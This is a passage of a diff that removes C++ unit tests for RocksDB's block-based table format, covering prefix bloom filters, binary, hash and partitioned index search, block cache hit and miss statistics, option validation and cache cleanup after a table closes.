-  // To tickle the PrefixMayMatch bug it is important that the
-  // user-key is a single byte so that the index key exactly matches
-  // the user-key.
-  InternalKey key("a", 1, kTypeValue);
-  c.Add(key.Encode().ToString(), "b");
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  const ImmutableCFOptions ioptions(options);
-  const InternalKeyComparator internal_comparator(options.comparator);
-  c.Finish(options, ioptions, table_options, internal_comparator, &keys,
-           &kvmap);
-
-  auto* reader = c.GetTableReader();
-  for (int i = 0; i < 2; ++i) {
-    ReadOptions ro;
-    ro.total_order_seek = (i == 0);
-    std::unique_ptr<InternalIterator> iter(reader->NewIterator(ro));
-
-    iter->Seek(key.Encode());
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a", ExtractUserKey(iter->key()).ToString());
-  }
-}
-
-TEST_F(BlockBasedTableTest, SkipPrefixBloomFilter) {
-  // if DB is opened with a prefix extractor of a different name,
-  // prefix bloom is skipped when read the file
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(2));
-  table_options.whole_key_filtering = false;
-
-  Options options;
-  options.comparator = BytewiseComparator();
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-
-  TableConstructor c(options.comparator);
-  InternalKey key("abcdefghijk", 1, kTypeValue);
-  c.Add(key.Encode().ToString(), "test");
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  const ImmutableCFOptions ioptions(options);
-  const InternalKeyComparator internal_comparator(options.comparator);
-  c.Finish(options, ioptions, table_options, internal_comparator, &keys,
-           &kvmap);
-  options.prefix_extractor.reset(NewFixedPrefixTransform(9));
-  const ImmutableCFOptions new_ioptions(options);
-  c.Reopen(new_ioptions);
-  auto reader = c.GetTableReader();
-  std::unique_ptr<InternalIterator> db_iter(reader->NewIterator(ReadOptions()));
-
-  // Test point lookup
-  // only one kv
-  for (auto& kv : kvmap) {
-    db_iter->Seek(kv.first);
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_OK(db_iter->status());
-    ASSERT_EQ(db_iter->key(), kv.first);
-    ASSERT_EQ(db_iter->value(), kv.second);
-  }
-}
-
-static std::string RandomString(Random* rnd, int len) {
-  std::string r;
-  test::RandomString(rnd, len, &r);
-  return r;
-}
-
-void AddInternalKey(TableConstructor* c, const std::string& prefix,
-                    int suffix_len = 800) {
-  static Random rnd(1023);
-  InternalKey k(prefix + RandomString(&rnd, 800), 0, kTypeValue);
-  c->Add(k.Encode().ToString(), "v");
-}
-
-void TableTest::IndexTest(BlockBasedTableOptions table_options) {
-  TableConstructor c(BytewiseComparator());
-
-  // keys with prefix length 3, make sure the key/value is big enough to fill
-  // one block
-  AddInternalKey(&c, "0015");
-  AddInternalKey(&c, "0035");
-
-  AddInternalKey(&c, "0054");
-  AddInternalKey(&c, "0055");
-
-  AddInternalKey(&c, "0056");
-  AddInternalKey(&c, "0057");
-
-  AddInternalKey(&c, "0058");
-  AddInternalKey(&c, "0075");
-
-  AddInternalKey(&c, "0076");
-  AddInternalKey(&c, "0095");
-
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  Options options;
-  options.prefix_extractor.reset(NewFixedPrefixTransform(3));
-  table_options.block_size = 1700;
-  table_options.block_cache = NewLRUCache(1024, 4);
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  std::unique_ptr<InternalKeyComparator> comparator(
-      new InternalKeyComparator(BytewiseComparator()));
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options, *comparator, &keys, &kvmap);
-  auto reader = c.GetTableReader();
-
-  auto props = reader->GetTableProperties();
-  ASSERT_EQ(5u, props->num_data_blocks);
-
-  std::unique_ptr<InternalIterator> index_iter(
-      reader->NewIterator(ReadOptions()));
-
-  // -- Find keys do not exist, but have common prefix.
-  std::vector<std::string> prefixes = {"001", "003", "005", "007", "009"};
-  std::vector<std::string> lower_bound = {keys[0], keys[1], keys[2],
-                                          keys[7], keys[9], };
-
-  // find the lower bound of the prefix
-  for (size_t i = 0; i < prefixes.size(); ++i) {
-    index_iter->Seek(InternalKey(prefixes[i], 0, kTypeValue).Encode());
-    ASSERT_OK(index_iter->status());
-    ASSERT_TRUE(index_iter->Valid());
-
-    // seek the first element in the block
-    ASSERT_EQ(lower_bound[i], index_iter->key().ToString());
-    ASSERT_EQ("v", index_iter->value().ToString());
-  }
-
-  // find the upper bound of prefixes
-  std::vector<std::string> upper_bound = {keys[1], keys[2], keys[7], keys[9], };
-
-  // find existing keys
-  for (const auto& item : kvmap) {
-    auto ukey = ExtractUserKey(item.first).ToString();
-    index_iter->Seek(ukey);
-
-    // ASSERT_OK(regular_iter->status());
-    ASSERT_OK(index_iter->status());
-
-    // ASSERT_TRUE(regular_iter->Valid());
-    ASSERT_TRUE(index_iter->Valid());
-
-    ASSERT_EQ(item.first, index_iter->key().ToString());
-    ASSERT_EQ(item.second, index_iter->value().ToString());
-  }
-
-  for (size_t i = 0; i < prefixes.size(); ++i) {
-    // the key is greater than any existing keys.
-    auto key = prefixes[i] + "9";
-    index_iter->Seek(InternalKey(key, 0, kTypeValue).Encode());
-
-    ASSERT_OK(index_iter->status());
-    if (i == prefixes.size() - 1) {
-      // last key
-      ASSERT_TRUE(!index_iter->Valid());
-    } else {
-      ASSERT_TRUE(index_iter->Valid());
-      // seek the first element in the block
-      ASSERT_EQ(upper_bound[i], index_iter->key().ToString());
-      ASSERT_EQ("v", index_iter->value().ToString());
-    }
-  }
-
-  // find keys with prefix that don't match any of the existing prefixes.
-  std::vector<std::string> non_exist_prefixes = {"002", "004", "006", "008"};
-  for (const auto& prefix : non_exist_prefixes) {
-    index_iter->Seek(InternalKey(prefix, 0, kTypeValue).Encode());
-    // regular_iter->Seek(prefix);
-
-    ASSERT_OK(index_iter->status());
-    // Seek to non-existing prefixes should yield either invalid, or a
-    // key with prefix greater than the target.
-    if (index_iter->Valid()) {
-      Slice ukey = ExtractUserKey(index_iter->key());
-      Slice ukey_prefix = options.prefix_extractor->Transform(ukey);
-      ASSERT_TRUE(BytewiseComparator()->Compare(prefix, ukey_prefix) < 0);
-    }
-  }
-  c.ResetTableReader();
-}
-
-TEST_F(TableTest, BinaryIndexTest) {
-  BlockBasedTableOptions table_options;
-  table_options.index_type = BlockBasedTableOptions::kBinarySearch;
-  IndexTest(table_options);
-}
-
-TEST_F(TableTest, HashIndexTest) {
-  BlockBasedTableOptions table_options;
-  table_options.index_type = BlockBasedTableOptions::kHashSearch;
-  IndexTest(table_options);
-}
-
-TEST_F(TableTest, PartitionIndexTest) {
-  const int max_index_keys = 5;
-  const int est_max_index_key_value_size = 32;
-  const int est_max_index_size = max_index_keys * est_max_index_key_value_size;
-  for (int i = 1; i <= est_max_index_size + 1; i++) {
-    BlockBasedTableOptions table_options;
-    table_options.index_type = BlockBasedTableOptions::kTwoLevelIndexSearch;
-    table_options.metadata_block_size = i;
-    IndexTest(table_options);
-  }
-}
-
-// It's very hard to figure out the index block size of a block accurately.
-// To make sure we get the index size, we just make sure as key number
-// grows, the filter block size also grows.
-TEST_F(BlockBasedTableTest, IndexSizeStat) {
-  uint64_t last_index_size = 0;
-
-  // we need to use random keys since the pure human readable texts
-  // may be well compressed, resulting insignifcant change of index
-  // block size.
-  Random rnd(test::RandomSeed());
-  std::vector<std::string> keys;
-
-  for (int i = 0; i < 100; ++i) {
-    keys.push_back(RandomString(&rnd, 10000));
-  }
-
-  // Each time we load one more key to the table. the table index block
-  // size is expected to be larger than last time's.
-  for (size_t i = 1; i < keys.size(); ++i) {
-    TableConstructor c(BytewiseComparator(),
-                       true /* convert_to_internal_key_ */);
-    for (size_t j = 0; j < i; ++j) {
-      c.Add(keys[j], "val");
-    }
-
-    std::vector<std::string> ks;
-    stl_wrappers::KVMap kvmap;
-    Options options;
-    options.compression = kNoCompression;
-    BlockBasedTableOptions table_options;
-    table_options.block_restart_interval = 1;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-    const ImmutableCFOptions ioptions(options);
-    c.Finish(options, ioptions, table_options,
-             GetPlainInternalComparator(options.comparator), &ks, &kvmap);
-    auto index_size = c.GetTableReader()->GetTableProperties()->index_size;
-    ASSERT_GT(index_size, last_index_size);
-    last_index_size = index_size;
-    c.ResetTableReader();
-  }
-}
-
-TEST_F(BlockBasedTableTest, NumBlockStat) {
-  Random rnd(test::RandomSeed());
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  Options options;
-  options.compression = kNoCompression;
-  BlockBasedTableOptions table_options;
-  table_options.block_restart_interval = 1;
-  table_options.block_size = 1000;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  for (int i = 0; i < 10; ++i) {
-    // the key/val are slightly smaller than block size, so that each block
-    // holds roughly one key/value pair.
-    c.Add(RandomString(&rnd, 900), "val");
-  }
-
-  std::vector<std::string> ks;
-  stl_wrappers::KVMap kvmap;
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options,
-           GetPlainInternalComparator(options.comparator), &ks, &kvmap);
-  ASSERT_EQ(kvmap.size(),
-            c.GetTableReader()->GetTableProperties()->num_data_blocks);
-  c.ResetTableReader();
-}
-
-// A simple tool that takes the snapshot of block cache statistics.
-class BlockCachePropertiesSnapshot {
- public:
-  explicit BlockCachePropertiesSnapshot(Statistics* statistics) {
-    block_cache_miss = statistics->getTickerCount(BLOCK_CACHE_MISS);
-    block_cache_hit = statistics->getTickerCount(BLOCK_CACHE_HIT);
-    index_block_cache_miss = statistics->getTickerCount(BLOCK_CACHE_INDEX_MISS);
-    index_block_cache_hit = statistics->getTickerCount(BLOCK_CACHE_INDEX_HIT);
-    data_block_cache_miss = statistics->getTickerCount(BLOCK_CACHE_DATA_MISS);
-    data_block_cache_hit = statistics->getTickerCount(BLOCK_CACHE_DATA_HIT);
-    filter_block_cache_miss =
-        statistics->getTickerCount(BLOCK_CACHE_FILTER_MISS);
-    filter_block_cache_hit = statistics->getTickerCount(BLOCK_CACHE_FILTER_HIT);
-    block_cache_bytes_read = statistics->getTickerCount(BLOCK_CACHE_BYTES_READ);
-    block_cache_bytes_write =
-        statistics->getTickerCount(BLOCK_CACHE_BYTES_WRITE);
-  }
-
-  void AssertIndexBlockStat(int64_t expected_index_block_cache_miss,
-                            int64_t expected_index_block_cache_hit) {
-    ASSERT_EQ(expected_index_block_cache_miss, index_block_cache_miss);
-    ASSERT_EQ(expected_index_block_cache_hit, index_block_cache_hit);
-  }
-
-  void AssertFilterBlockStat(int64_t expected_filter_block_cache_miss,
-                             int64_t expected_filter_block_cache_hit) {
-    ASSERT_EQ(expected_filter_block_cache_miss, filter_block_cache_miss);
-    ASSERT_EQ(expected_filter_block_cache_hit, filter_block_cache_hit);
-  }
-
-  // Check if the fetched props matches the expected ones.
-  // TODO(kailiu) Use this only when you disabled filter policy!
-  void AssertEqual(int64_t expected_index_block_cache_miss,
-                   int64_t expected_index_block_cache_hit,
-                   int64_t expected_data_block_cache_miss,
-                   int64_t expected_data_block_cache_hit) const {
-    ASSERT_EQ(expected_index_block_cache_miss, index_block_cache_miss);
-    ASSERT_EQ(expected_index_block_cache_hit, index_block_cache_hit);
-    ASSERT_EQ(expected_data_block_cache_miss, data_block_cache_miss);
-    ASSERT_EQ(expected_data_block_cache_hit, data_block_cache_hit);
-    ASSERT_EQ(expected_index_block_cache_miss + expected_data_block_cache_miss,
-              block_cache_miss);
-    ASSERT_EQ(expected_index_block_cache_hit + expected_data_block_cache_hit,
-              block_cache_hit);
-  }
-
-  int64_t GetCacheBytesRead() { return block_cache_bytes_read; }
-
-  int64_t GetCacheBytesWrite() { return block_cache_bytes_write; }
-
- private:
-  int64_t block_cache_miss = 0;
-  int64_t block_cache_hit = 0;
-  int64_t index_block_cache_miss = 0;
-  int64_t index_block_cache_hit = 0;
-  int64_t data_block_cache_miss = 0;
-  int64_t data_block_cache_hit = 0;
-  int64_t filter_block_cache_miss = 0;
-  int64_t filter_block_cache_hit = 0;
-  int64_t block_cache_bytes_read = 0;
-  int64_t block_cache_bytes_write = 0;
-};
-
-// Make sure, by default, index/filter blocks were pre-loaded (meaning we won't
-// use block cache to store them).
-TEST_F(BlockBasedTableTest, BlockCacheDisabledTest) {
-  Options options;
-  options.create_if_missing = true;
-  options.statistics = CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.block_cache = NewLRUCache(1024, 4);
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  c.Add("key", "value");
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options,
-           GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-
-  // preloading filter/index blocks is enabled.
-  auto reader = dynamic_cast<BlockBasedTable*>(c.GetTableReader());
-  ASSERT_TRUE(reader->TEST_filter_block_preloaded());
-  ASSERT_TRUE(reader->TEST_index_reader_preloaded());
-
-  {
-    // nothing happens in the beginning
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertIndexBlockStat(0, 0);
-    props.AssertFilterBlockStat(0, 0);
-  }
-
-  {
-    GetContext get_context(options.comparator, nullptr, nullptr, nullptr,
-                           GetContext::kNotFound, Slice(), nullptr, nullptr,
-                           nullptr, nullptr, nullptr);
-    // a hack that just to trigger BlockBasedTable::GetFilter.
-    reader->Get(ReadOptions(), "non-exist-key", &get_context);
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertIndexBlockStat(0, 0);
-    props.AssertFilterBlockStat(0, 0);
-  }
-}
-
-// Due to the difficulities of the intersaction between statistics, this test
-// only tests the case when "index block is put to block cache"
-TEST_F(BlockBasedTableTest, FilterBlockInBlockCache) {
-  // -- Table construction
-  Options options;
-  options.create_if_missing = true;
-  options.statistics = CreateDBStatistics();
-
-  // Enable the cache for index/filter blocks
-  BlockBasedTableOptions table_options;
-  table_options.block_cache = NewLRUCache(1024, 4);
-  table_options.cache_index_and_filter_blocks = true;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  c.Add("key", "value");
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options,
-           GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-  // preloading filter/index blocks is prohibited.
-  auto* reader = dynamic_cast<BlockBasedTable*>(c.GetTableReader());
-  ASSERT_TRUE(!reader->TEST_filter_block_preloaded());
-  ASSERT_TRUE(!reader->TEST_index_reader_preloaded());
-
-  // -- PART 1: Open with regular block cache.
-  // Since block_cache is disabled, no cache activities will be involved.
-  unique_ptr<InternalIterator> iter;
-
-  int64_t last_cache_bytes_read = 0;
-  // At first, no block will be accessed.
-  {
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    // index will be added to block cache.
-    props.AssertEqual(1,  // index block miss
-                      0, 0, 0);
-    ASSERT_EQ(props.GetCacheBytesRead(), 0);
-    ASSERT_EQ(props.GetCacheBytesWrite(),
-              table_options.block_cache->GetUsage());
-    last_cache_bytes_read = props.GetCacheBytesRead();
-  }
-
-  // Only index block will be accessed
-  {
-    iter.reset(c.NewIterator());
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    // NOTE: to help better highlight the "detla" of each ticker, I use
-    // <last_value> + <added_value> to indicate the increment of changed
-    // value; other numbers remain the same.
-    props.AssertEqual(1, 0 + 1,  // index block hit
-                      0, 0);
-    // Cache hit, bytes read from cache should increase
-    ASSERT_GT(props.GetCacheBytesRead(), last_cache_bytes_read);
-    ASSERT_EQ(props.GetCacheBytesWrite(),
-              table_options.block_cache->GetUsage());
-    last_cache_bytes_read = props.GetCacheBytesRead();
-  }
-
-  // Only data block will be accessed
-  {
-    iter->SeekToFirst();
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertEqual(1, 1, 0 + 1,  // data block miss
-                      0);
-    // Cache miss, Bytes read from cache should not change
-    ASSERT_EQ(props.GetCacheBytesRead(), last_cache_bytes_read);
-    ASSERT_EQ(props.GetCacheBytesWrite(),
-              table_options.block_cache->GetUsage());
-    last_cache_bytes_read = props.GetCacheBytesRead();
-  }
-
-  // Data block will be in cache
-  {
-    iter.reset(c.NewIterator());
-    iter->SeekToFirst();
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertEqual(1, 1 + 1, /* index block hit */
-                      1, 0 + 1 /* data block hit */);
-    // Cache hit, bytes read from cache should increase
-    ASSERT_GT(props.GetCacheBytesRead(), last_cache_bytes_read);
-    ASSERT_EQ(props.GetCacheBytesWrite(),
-              table_options.block_cache->GetUsage());
-  }
-  // release the iterator so that the block cache can reset correctly.
-  iter.reset();
-
-  c.ResetTableReader();
-
-  // -- PART 2: Open with very small block cache
-  // In this test, no block will ever get hit since the block cache is
-  // too small to fit even one entry.
-  table_options.block_cache = NewLRUCache(1, 4);
-  options.statistics = CreateDBStatistics();
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  const ImmutableCFOptions ioptions2(options);
-  c.Reopen(ioptions2);
-  {
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertEqual(1,  // index block miss
-                      0, 0, 0);
-    // Cache miss, Bytes read from cache should not change
-    ASSERT_EQ(props.GetCacheBytesRead(), 0);
-  }
-
-  {
-    // Both index and data block get accessed.
-    // It first cache index block then data block. But since the cache size
-    // is only 1, index block will be purged after data block is inserted.
-    iter.reset(c.NewIterator());
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertEqual(1 + 1,  // index block miss
-                      0, 0,   // data block miss
-                      0);
-    // Cache hit, bytes read from cache should increase
-    ASSERT_EQ(props.GetCacheBytesRead(), 0);
-  }
-
-  {
-    // SeekToFirst() accesses data block. With similar reason, we expect data
-    // block's cache miss.
-    iter->SeekToFirst();
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertEqual(2, 0, 0 + 1,  // data block miss
-                      0);
-    // Cache miss, Bytes read from cache should not change
-    ASSERT_EQ(props.GetCacheBytesRead(), 0);
-  }
-  iter.reset();
-  c.ResetTableReader();
-
-  // -- PART 3: Open table with bloom filter enabled but not in SST file
-  table_options.block_cache = NewLRUCache(4096, 4);
-  table_options.cache_index_and_filter_blocks = false;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  TableConstructor c3(BytewiseComparator());
-  std::string user_key = "k01";
-  InternalKey internal_key(user_key, 0, kTypeValue);
-  c3.Add(internal_key.Encode().ToString(), "hello");
-  ImmutableCFOptions ioptions3(options);
-  // Generate table without filter policy
-  c3.Finish(options, ioptions3, table_options,
-            GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-  c3.ResetTableReader();
-
-  // Open table with filter policy
-  table_options.filter_policy.reset(NewBloomFilterPolicy(1));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  options.statistics = CreateDBStatistics();
-  ImmutableCFOptions ioptions4(options);
-  ASSERT_OK(c3.Reopen(ioptions4));
-  reader = dynamic_cast<BlockBasedTable*>(c3.GetTableReader());
-  ASSERT_TRUE(!reader->TEST_filter_block_preloaded());
-  PinnableSlice value;
-  GetContext get_context(options.comparator, nullptr, nullptr, nullptr,
-                         GetContext::kNotFound, user_key, &value, nullptr,
-                         nullptr, nullptr, nullptr);
-  ASSERT_OK(reader->Get(ReadOptions(), user_key, &get_context));
-  ASSERT_STREQ(value.data(), "hello");
-  BlockCachePropertiesSnapshot props(options.statistics.get());
-  props.AssertFilterBlockStat(0, 0);
-  c3.ResetTableReader();
-}
-
-void ValidateBlockSizeDeviation(int value, int expected) {
-  BlockBasedTableOptions table_options;
-  table_options.block_size_deviation = value;
-  BlockBasedTableFactory* factory = new BlockBasedTableFactory(table_options);
-
-  const BlockBasedTableOptions* normalized_table_options =
-      (const BlockBasedTableOptions*)factory->GetOptions();
-  ASSERT_EQ(normalized_table_options->block_size_deviation, expected);
-
-  delete factory;
-}
-
-void ValidateBlockRestartInterval(int value, int expected) {
-  BlockBasedTableOptions table_options;
-  table_options.block_restart_interval = value;
-  BlockBasedTableFactory* factory = new BlockBasedTableFactory(table_options);
-
-  const BlockBasedTableOptions* normalized_table_options =
-      (const BlockBasedTableOptions*)factory->GetOptions();
-  ASSERT_EQ(normalized_table_options->block_restart_interval, expected);
-
-  delete factory;
-}
-
-TEST_F(BlockBasedTableTest, InvalidOptions) {
-  // invalid values for block_size_deviation (<0 or >100) are silently set to 0
-  ValidateBlockSizeDeviation(-10, 0);
-  ValidateBlockSizeDeviation(-1, 0);
-  ValidateBlockSizeDeviation(0, 0);
-  ValidateBlockSizeDeviation(1, 1);
-  ValidateBlockSizeDeviation(99, 99);
-  ValidateBlockSizeDeviation(100, 100);
-  ValidateBlockSizeDeviation(101, 0);
-  ValidateBlockSizeDeviation(1000, 0);
-
-  // invalid values for block_restart_interval (<1) are silently set to 1
-  ValidateBlockRestartInterval(-10, 1);
-  ValidateBlockRestartInterval(-1, 1);
-  ValidateBlockRestartInterval(0, 1);
-  ValidateBlockRestartInterval(1, 1);
-  ValidateBlockRestartInterval(2, 2);
-  ValidateBlockRestartInterval(1000, 1000);
-}
-
-TEST_F(BlockBasedTableTest, BlockReadCountTest) {
-  // bloom_filter_type = 0 -- block-based filter
-  // bloom_filter_type = 0 -- full filter
-  for (int bloom_filter_type = 0; bloom_filter_type < 2; ++bloom_filter_type) {
-    for (int index_and_filter_in_cache = 0; index_and_filter_in_cache < 2;
-         ++index_and_filter_in_cache) {
-      Options options;
-      options.create_if_missing = true;
-
-      BlockBasedTableOptions table_options;
-      table_options.block_cache = NewLRUCache(1, 0);
-      table_options.cache_index_and_filter_blocks = index_and_filter_in_cache;
-      table_options.filter_policy.reset(
-          NewBloomFilterPolicy(10, bloom_filter_type == 0));
-      options.table_factory.reset(new BlockBasedTableFactory(table_options));
-      std::vector<std::string> keys;
-      stl_wrappers::KVMap kvmap;
-
-      TableConstructor c(BytewiseComparator());
-      std::string user_key = "k04";
-      InternalKey internal_key(user_key, 0, kTypeValue);
-      std::string encoded_key = internal_key.Encode().ToString();
-      c.Add(encoded_key, "hello");
-      ImmutableCFOptions ioptions(options);
-      // Generate table with filter policy
-      c.Finish(options, ioptions, table_options,
-               GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-      auto reader = c.GetTableReader();
-      PinnableSlice value;
-      GetContext get_context(options.comparator, nullptr, nullptr, nullptr,
-                             GetContext::kNotFound, user_key, &value, nullptr,
-                             nullptr, nullptr, nullptr);
-      get_perf_context()->Reset();
-      ASSERT_OK(reader->Get(ReadOptions(), encoded_key, &get_context));
-      if (index_and_filter_in_cache) {
-        // data, index and filter block
-        ASSERT_EQ(get_perf_context()->block_read_count, 3);
-      } else {
-        // just the data block
-        ASSERT_EQ(get_perf_context()->block_read_count, 1);
-      }
-      ASSERT_EQ(get_context.State(), GetContext::kFound);
-      ASSERT_STREQ(value.data(), "hello");
-
-      // Get non-existing key
-      user_key = "does-not-exist";
-      internal_key = InternalKey(user_key, 0, kTypeValue);
-      encoded_key = internal_key.Encode().ToString();
-
-      value.Reset();
-      get_context = GetContext(options.comparator, nullptr, nullptr, nullptr,
-                               GetContext::kNotFound, user_key, &value, nullptr,
-                               nullptr, nullptr, nullptr);
-      get_perf_context()->Reset();
-      ASSERT_OK(reader->Get(ReadOptions(), encoded_key, &get_context));
-      ASSERT_EQ(get_context.State(), GetContext::kNotFound);
-
-      if (index_and_filter_in_cache) {
-        if (bloom_filter_type == 0) {
-          // with block-based, we read index and then the filter
-          ASSERT_EQ(get_perf_context()->block_read_count, 2);
-        } else {
-          // with full-filter, we read filter first and then we stop
-          ASSERT_EQ(get_perf_context()->block_read_count, 1);
-        }
-      } else {
-        // filter is already in memory and it figures out that the key doesn't
-        // exist
-        ASSERT_EQ(get_perf_context()->block_read_count, 0);
-      }
-    }
-  }
-}
-
-// A wrapper around LRICache that also keeps track of data blocks (in contrast
-// with the objects) in the cache. The class is very simple and can be used only
-// for trivial tests.
-class MockCache : public LRUCache {
- public:
-  MockCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit,
-            double high_pri_pool_ratio)
-      : LRUCache(capacity, num_shard_bits, strict_capacity_limit,
-                 high_pri_pool_ratio) {}
-  virtual Status Insert(const Slice& key, void* value, size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Handle** handle = nullptr,
-                        Priority priority = Priority::LOW) override {
-    // Replace the deleter with our own so that we keep track of data blocks
-    // erased from the cache
-    deleters_[key.ToString()] = deleter;
-    return ShardedCache::Insert(key, value, charge, &MockDeleter, handle,
-                                priority);
-  }
-  // This is called by the application right after inserting a data block
-  virtual void TEST_mark_as_data_block(const Slice& key,
-                                       size_t charge) override {
-    marked_data_in_cache_[key.ToString()] = charge;
-    marked_size_ += charge;
-  }
-  using DeleterFunc = void (*)(const Slice& key, void* value);
-  static std::map<std::string, DeleterFunc> deleters_;
-  static std::map<std::string, size_t> marked_data_in_cache_;
-  static size_t marked_size_;
-  static void MockDeleter(const Slice& key, void* value) {
-    // If the item was marked for being data block, decrease its usage from  the
-    // total data block usage of the cache
-    if (marked_data_in_cache_.find(key.ToString()) !=
-        marked_data_in_cache_.end()) {
-      marked_size_ -= marked_data_in_cache_[key.ToString()];
-    }
-    // Then call the origianl deleter
-    assert(deleters_.find(key.ToString()) != deleters_.end());
-    auto deleter = deleters_[key.ToString()];
-    deleter(key, value);
-  }
-};
-
-size_t MockCache::marked_size_ = 0;
-std::map<std::string, MockCache::DeleterFunc> MockCache::deleters_;
-std::map<std::string, size_t> MockCache::marked_data_in_cache_;
-
-// Block cache can contain raw data blocks as well as general objects. If an
-// object depends on the table to be live, it then must be destructed before the
-// table is closed. This test makes sure that the only items remains in the
-// cache after the table is closed are raw data blocks.
-TEST_F(BlockBasedTableTest, NoObjectInCacheAfterTableClose) {
-  for (auto index_type :
-       {BlockBasedTableOptions::IndexType::kBinarySearch,
-        BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch}) {
-    for (bool block_based_filter : {true, false}) {
-      for (bool partition_filter : {true, false}) {
-        if (partition_filter &&
-            (block_based_filter ||
-             index_type !=
-                 BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch)) {
-          continue;
-        }
-        for (bool index_and_filter_in_cache : {true, false}) {
-          for (bool pin_l0 : {true, false}) {
-            if (pin_l0 && !index_and_filter_in_cache) {
-              continue;
-            }
-            // Create a table
-            Options opt;
-            unique_ptr<InternalKeyComparator> ikc;
-            ikc.reset(new test::PlainInternalKeyComparator(opt.comparator));
-            opt.compression = kNoCompression;
-            BlockBasedTableOptions table_options;
-            table_options.block_size = 1024;
-            table_options.index_type =
-                BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-            table_options.pin_l0_filter_and_index_blocks_in_cache = pin_l0;
-            table_options.partition_filters = partition_filter;
-            table_options.cache_index_and_filter_blocks =
-                index_and_filter_in_cache;
-            // big enough so we don't ever lose cached values.
-            table_options.block_cache = std::shared_ptr<rocksdb::Cache>(
-                new MockCache(16 * 1024 * 1024, 4, false, 0.0));
-            table_options.filter_policy.reset(
-                rocksdb::NewBloomFilterPolicy(10, block_based_filter));
-            opt.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-            TableConstructor c(BytewiseComparator());
-            std::string user_key = "k01";
-            std::string key =
-                InternalKey(user_key, 0, kTypeValue).Encode().ToString();
-            c.Add(key, "hello");
-            std::vector<std::string> keys;
-            stl_wrappers::KVMap kvmap;
-            const ImmutableCFOptions ioptions(opt);
-            c.Finish(opt, ioptions, table_options, *ikc, &keys, &kvmap);
-
-            // Doing a read to make index/filter loaded into the cache
-            auto table_reader =
-                dynamic_cast<BlockBasedTable*>(c.GetTableReader());
-            PinnableSlice value;
-            GetContext get_context(opt.comparator, nullptr, nullptr, nullptr,
-                                   GetContext::kNotFound, user_key, &value,
-                                   nullptr, nullptr, nullptr, nullptr);
-            InternalKey ikey(user_key, 0, kTypeValue);
-            auto s = table_reader->Get(ReadOptions(), key, &get_context);
-            ASSERT_EQ(get_context.State(), GetContext::kFound);
-            ASSERT_STREQ(value.data(), "hello");
-
-            // Close the table
-            c.ResetTableReader();
-
-            auto usage = table_options.block_cache->GetUsage();
-            auto pinned_usage = table_options.block_cache->GetPinnedUsage();
-            // The only usage must be for marked data blocks
-            ASSERT_EQ(usage, MockCache::marked_size_);
-            // There must be some pinned data since PinnableSlice has not
-            // released them yet
-            ASSERT_GT(pinned_usage, 0);
-            // Release pinnable slice reousrces
-            value.Reset();
-            pinned_usage = table_options.block_cache->GetPinnedUsage();
-            ASSERT_EQ(pinned_usage, 0);
-          }
-        }
-      }
-    }
-  }
-}
-
-TEST_F(BlockBasedTableTest, BlockCacheLeak) {
-  // Check that when we reopen a table we don't lose access to blocks already
-  // in the cache. This test checks whether the Table actually makes use of the
-  // unique ID from the file.
-
-  Options opt;
-  unique_ptr<InternalKeyComparator> ikc;
-  ikc.reset(new test::PlainInternalKeyComparator(opt.comparator));
-  opt.compression = kNoCompression;
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  // big enough so we don't ever lose cached values.
-  table_options.block_cache = NewLRUCache(16 * 1024 * 1024, 4);
-  opt.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  c.Add("k01", "hello");
-  c.Add("k02", "hello2");
-  c.Add("k03", std::string(10000, 'x'));
